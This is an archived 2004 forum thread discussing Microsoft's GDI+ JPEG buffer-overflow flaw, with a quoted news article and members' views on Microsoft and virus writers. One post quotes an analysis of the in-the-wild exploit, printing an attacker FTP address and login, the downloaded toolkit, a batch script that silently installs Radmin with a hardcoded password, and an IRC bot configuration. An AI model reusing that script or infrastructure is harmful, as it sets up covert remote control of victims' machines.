This is topic Viruses in JPEG images in forum Film-Yak at Film-Tech Forum ARCHIVE.


To visit this topic, use this URL:
https://ft-forum.com/ft/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=8;t=003575

Posted by Brad Miller (Member # 2) on 09-19-2004, 12:41 AM:
 
As if we don't have enough spamming and viruses in this world...

Microsoft warns of poisoned picture peril

quote:
Microsoft warns of poisoned picture peril

By Kevin Poulsen, SecurityFocus
Published Wednesday 15th September 2004 07:39 GMT

The old bromide that promises you can't get a computer virus by looking at an image file crumbled a bit further Tuesday when Microsoft announced a critical vulnerability in its software's handling of the ubiquitous JPEG graphics format.

The security hole is a buffer overflow that potentially allows an attacker to craft a special JPEG file that would take control of a victim's machine when the user views it through Internet Explorer, Outlook, Word, and other programs. The poisoned picture could be displayed on a website, sent in email, or circulated on a P2P network.

Windows XP, Windows Server 2003 and Office XP are vulnerable. Older versions of Windows are also at risk if the user has installed any of a dozen other Microsoft applications that use the same flawed code, the company said in its advisory. The newly-released Windows XP Service Pack 2 does not contain the hole, but vulnerable versions of Office running atop it can still be attacked if left unpatched. Patches are available from Microsoft's website.

The company said it's not aware of the hole being publicly exploited in the wild, and has not seen any examples of proof of concept code.

The JPEG bug rounds out a growing menagerie of vulnerabilities in code that displays image files. Mozilla developers last month patched the open-source browser against a critical hole discovered in a widely-deployed library for processing PNG images. And last July, Microsoft simultaneously fixed two image display holes in Internet Explorer: one made users potentially vulnerable to maliciously-crafted BMP images, the second to corrupt GIF files. The GIF bug had been publicly disclosed 11 months earlier.

There was a time when the idea of a malicious image file was absurd enough to be the topic of an April Fools joke. One early and widely-circulated hoax message dating from 1994 warned users of a computer virus infecting the comment field of JPEG files.

"It was someone saying that just looking at a JPEG on your screen can get you a virus," recalls Rob Rosenberg, editor of the debunking site Vmyths.com. "In '94 it was a myth, but in '04 it's the real thing... We've got the JPEG of death now."

Here is what Microsoft's website has to say
 
Posted by Joe Redifer (Member # 3) on 09-19-2004, 12:59 AM:
 
Microsoft should hire some full time employees that are actually smart. Why are there so many dumbasses who work for big corporations that don't make good products? Hell, I doubt they even beta test their products. But people will stupidly keep buying it, so Microsoft has NOTHING to worry about.
 
Posted by Bruce Hansen (Member # 281) on 09-19-2004, 02:08 PM:
 
Microsoft products have so many patches on them, they look like quilts.
 
Posted by Steve Kraus (Member # 476) on 09-19-2004, 07:19 PM:
 
Is it about time to consider criminal penalties for people who write or disseminate viruses, etc.? This is costing society billions.
 
Posted by Joe Redifer (Member # 3) on 09-19-2004, 07:59 PM:
 
I think such penalties do exist. But it is extremely difficult to find the perpetrators.
 
Posted by Steve Kraus (Member # 476) on 09-19-2004, 08:21 PM:
 
You don't suppose there is more than a symbiotic relationship (and by that I mean $$$) between virus makers and anti virus software vendors, do you? I mean who has the most to gain?
 
Posted by Bobby Henderson (Member # 840) on 09-19-2004, 10:48 PM:
 
I don't think there is much desire on the part of the government to crack down on virus writers. Aside from the anti-viral software industry conspiracy, there are other reasons for the lack of a crack down.

The government is probably not making lots of busts because they might wind up arresting more than a few political friends who also happen to be white collar criminals. I know this sounds like a reach, but think about it. To find virus writers means coming up with more efficient ways to follow money trails. If they go digging too efficiently into records of lots of financial transactions, some of their good-ol-boy-network buddies are going to get caught in the net as it is pulled into the boat.

Then you have the other problem: who the viruses are hurting.

The government clearly doesn't care about end users of personal computers and the lost productivity we suffer from all the spam and viruses. Big corporations are hardly affected by this at all. Sure, you'll get a denial of service attack once in awhile on a major web site. But overall major corporations suffer very little down time at all over this stuff. Their operations don't run on little off the shelf PCs. They're using UNIX mainframes and stuff like that.
 
Posted by Daryl C. W. O'Shea (Member # 1303) on 09-20-2004, 02:04 AM:
 
There's no money trail to follow. Anti-Virus companies don't need to pay people to write virii. There are plenty of college/university losers with no girlfriends to write them free o' charge.

More on topic. There aren't, as of the present, any virii embedded in JPEG files. It's possible to exploit certain pieces of software that use a common module, but no one has done it yet. Microsoft is, yet again, being proactive on patching their products.

The problem is they can't win either way. They release a patch before there's an exploit and lazy people don't install the patch. Then somebody reverse engineers the patch (not entirely hard to do if you know what you're doing), and releases an exploit to attack those long unpatched systems. People bitch at Microsoft. They can't win.

As for tracking down the people who write virii, etc. It's far more difficult to do than tracking down spam sources, for instance.

Imagine you come across a blank piece of generic paper. Then you go to some (any) library a type out something, like a riddle, whatever. Then print that on a very common (and therefore untraceable) printer, such as any number of Hewlett Packard LaserJets. The stick that riddle in an envelope, address, and stamp it, without leaving any personally identifying evidence. Then mail that from anywhere in the world. Yes, pretend that you can mail it anywhere in the world you want at no additional cost. Now tell me how to track you down after I receive it. It's not easy.

Sending instructions can be done annonymously so long as you don't require any response back. In some cases, you can even accept a response but drop it before it ever gets anywhere near you.
 
Posted by Ben Holley (Member # 2247) on 09-20-2004, 11:07 AM:
 
this may be a little offtopic but me and a computer savvy friend were discussing the amount of security flaws being discovered and exploited in windows has been on the rise since the homeland security act was passed. Which lead to us discussing if maybe microsoft was leaving backdoors in its patches and updates for big brother, has anyone else heard these rumors?
 
Posted by Jeff Stuckey (Member # 1718) on 09-20-2004, 04:45 PM:
 
I actually got this, and Cox Communications shut my service down. I called, and they said my account was suspended because I was sending out a virus. Which I thought was rather odd because I barely use my computer at home. So they turned me back on long enough to do a live update and scan the drive. It found no virus. I called them back and they still would not turn me back on. Said it was probably a trojan virus, then accused me of downloading from Kazaa that could probably be the problem. I promptly informed them I haven't used Kazaa for a year or so now. The professional all-knowing Cox tech then told me to just format my C drive, then call them back. [Mad] I told him I was behind three firewalls (router, Zone Alarm and Windows XP). He said that wouldn't matter. And Cox has this big anti-virus free campaign BS going on too.

I went in and did a system restore backing up about 2 days, then called them back the next morning. So far no problems. Was told by Cox that this was my first "strike". Two more, and they will not turn me back on. Nice, huh.

Some people have just way too much time on their hands.
 
Posted by Daryl C. W. O'Shea (Member # 1303) on 09-20-2004, 04:48 PM:
 
What's so wrong with Cox being responsible and protecting their and others' networks from abuse?

You did install all applicable security updates after you rolled back the system, right?
 
Posted by Bobby Henderson (Member # 840) on 09-20-2004, 06:18 PM:
 
quote: Daryl C. W. O'Shea
There's no money trail to follow.
Sure there is. Spammers make a lot of money from this method of advertising. And some spammers have been caught over the money exchanging hands instead of computer forensics.

There is also a money trail with all the fraud from phishing and other schemes. The federal government just doesn't feel like doing much about this problem because it doesn't appear to be hurting any powerful, politically connected people bad enough. To them it is just a minor annoyance. And for some businesses out there it is a gold mine.
 
Posted by Daryl C. W. O'Shea (Member # 1303) on 09-20-2004, 06:32 PM:
 
I thought we were talking about money trails to common virii, my bad.

quote: Bobby Henderson
To find virus writers means coming up with more efficient ways to follow money trails.

 
Posted by Mark Lensenmayer (Member # 134) on 09-27-2004, 10:06 PM:
 
Looks like it's not theoritical any more:

JPEG Virus Found

Here are some comments:

quote:
Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.

It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."

It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users where logged in!)

it downloads these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe

and executes 'execute.bat', which looks like:

regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server

it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d



 
Posted by Joe Redifer (Member # 3) on 09-27-2004, 10:48 PM:
 
Just another hole in the screen door known as Windows.
 
Posted by David Buckley (Member # 2600) on 09-28-2004, 12:50 AM:
 
MS certainly are trying harder with security, and I certainly applaud that, but being cynical, one could say they have a very low place from where to start, so anything is an improvement.

On the other hand, this is apparently a buffer overflow attack. Surely by now MS people should be writing code, and effective code auditing and review systems be in place, that this easy exploit just isnt there in system suppoosedly as secure as server 2003.

Sad.
 
Posted by Daryl C. W. O'Shea (Member # 1303) on 09-28-2004, 01:09 AM:
 
The server itself is secure, as long as you don't login interactively. Or more specifically, don't go directory browsing for JPEGs.

It's the shell, and thus IE also, that uses GDI+ package. Code that was written years ago and has been assumed to be good since nobody has noticed a problem with it until earlier this year. Reviewing all of the pre-existing packages used in such a large piece of software is pretty unrealistic. Having someone that can spot such problems isn't cheap. Your average entry level idiot programmer won't see it.

The root problem is that, until fairly recently, Microsoft, like most software companies, didn't properly engineer their software. A good design was rare, and a well engineered design and design process was mostly non-existent. People just hacking out solutions to problems in code was way too common, and to some extent is still too common today.

If you want to see something sad, look for the near zero announcements of other products that are affected by the flaw. There's probably hundreds of them since the GDI+ package is included in Microsoft's Development Studio code packages. Those companies are truely the sad ones. The ones blindly using code they don't understand and then forgetting they ever used it.
 
Posted by Randy Stankey (Member # 64) on 09-28-2004, 11:22 PM:
 
quote: Daryl C. W. O'Shea

The root problem is that, until fairly recently, Microsoft, like most software companies, didn't properly engineer their software.

I agree with that about 90%. There was a day when properly engineered code was a necessity. You may have had only 64 KB of memory to work with. Processors ran in the tens of MHz. at most. Floppies held 400 KB. You HAD to write code that fit within those limits and you HAD to make it run fast. Then, one day, systems started getting Bigger-Better-Faster-Cheaper. Over a period of years, people stopped worrying about whether or not their code would run in the "space" allotted on a given machine. To put it mildly; People got sloppy!

Now, we're starting to come around full circle. We have lots of "computes" to work with. Nobody has to worry about running out of memory, processor power or disk storage. (In most cases.) However, people have to worry about getting lost in the "forrest" of their own code!

It seems to me that few companies/people take the time to map out their plans/wants/needs for their software before they start. Without a map it's easy to get lost in the woods, so to speak. Once they start writing code, I see little evidence of "unit testing" like was done years ago. Once they get close to making a finished product, I see little evidence of proper alpha/beta testing anymore. Because of all this I see less and less evidence that people even know what to do with applications and/or system software that have bugs.

Back in the day... Way back in the 80's... I used to help a lot of friends of mine who were commercial software developers. I wasn't very good at writing software but I KNEW how to break it! [evil] They would give me software and my job was to beat on it as hard as I could then send it back broken. (Repeat until problems found approaches zero.)

I see little evidence of this kind of care in software development today. Cripes! The malware developers have better testing procedures than the "good guys"!
 
Posted by Bobby Henderson (Member # 840) on 09-29-2004, 12:09 AM:
 
I wonder how much of this problem stems from the habit of many software companies "frankensteining" together apps from a lots of pre-existing chunks of code. I've heard that stuff sometimes described as "public domain code" or something similar to that. I'm not a computer programmer. But I have the strong impression little, if any, modern application software is developed entirely from the ground up.

I see strange similarities in some graphics applications for instance. A $4,000 trade-specific sign design program will have some of the same functions, toolbars & menu designs as apps like Canvas or Illustrator --and even have the same damned bugs occuring! Every time a new version of Freehand, Illustrator or Corel has been released over the last few years, each version seems to have gotten slower and more buggy. About the only modern vector-drawing app any professional graphics person is upgrading to is IllustratorCS, but many always keep their 5 to 8 year old versions handy in case they have to jump back to something actually stable (in this category, that means Freehand 8, CorelDRAW 9 and Illustrator 7).

As sloooooooow as some of the graphics companies are to react (Macromedia in particular), I would not be surprised if this GDI+ thing showed up as a real threat across many graphics applications. Adobe Photoshop would be the only one I would expect to see patched on a fast basis. And the Mac version would probably get patched first (if need be). Very few PC users actually paid for their copies of Photoshop (which is also why only the PC version of PhotoshopCS has that software activation thingie).
 




Powered by Infopop Corporation
UBB.classicTM 6.3.1.2